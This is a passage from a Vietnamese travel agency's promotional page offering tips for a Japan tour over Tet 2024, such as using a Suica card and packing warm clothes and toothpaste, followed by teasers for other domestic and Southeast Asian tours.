>>>Xem thêm: Xin visa đi Nhật Bản du lịch có khó không?

Thẻ đi tàu

Nhật Bản là một đất nước khá rộng lớn và vô vàn các địa điểm du lịch xinh đẹp, du khách tour du lịch Nhật Bản Tết 2024 khó lòng nào mà đi hết được thế nên việc sắp xếp một lịch trình tham quan hợp lý là vô cùng cần thiết.

Một trong những phương tiện công cộng phổ biến và được sử dụng bởi hầu hết người dân Nhật Bản đó chính là tàu điện ngầm, xe buýt và tàu hỏa. Du khách tour du lịch Nhật Bản Tết 2024 có thể tự chuẩn bị cho mình một chiếc thẻ Suica để thanh toán cho các phương tiện công cộng, nhà hàng và cửa hàng tiện lợi trong thời gian du lịch Nhật Bản.

Các vật dụng cần thiết khác

Do Nhật Bản nằm gần biển nên khí hậu cũng có đôi chút bị ảnh hưởng khá thất thường. Thời điểm Tết thường se lạnh nên bạn hãy chuẩn bị cho mình một vài cái áo giữ ấm. Một số khách sạn tại Nhật sẽ không trang bị kem đánh răng nên bạn hãy chủ động tự chuẩn bị nhé.

Đó là những thông tin và kinh nghiệm mà Dideden muốn “mách nhỏ” đến quý du khách đang có dự định đi tour du lịch Nhật Bản Tết 2024 đến “đất nước mặt trời mọc” – Nhật Bản. Nếu cần thêm bất kỳ thông tin nào khác hoặc cần tư vấn hỗ trợ, quý khách vui lòng liên hệ hotline: 1900 3398 chúng tôi sẽ nhanh chóng phản hồi. Chúc quý khách tour du lịch Nhật Bản Tết 2024 có một chuyến đi đầy hứa hẹn!

ĐĂNG KÍ ĐẶT TOUR DU LỊCH NHẬT BẢN TẾT 2024

  • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
    Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
  • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
    Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
  • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
    Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
  • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
    Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
  • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
    Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
  • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
    Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]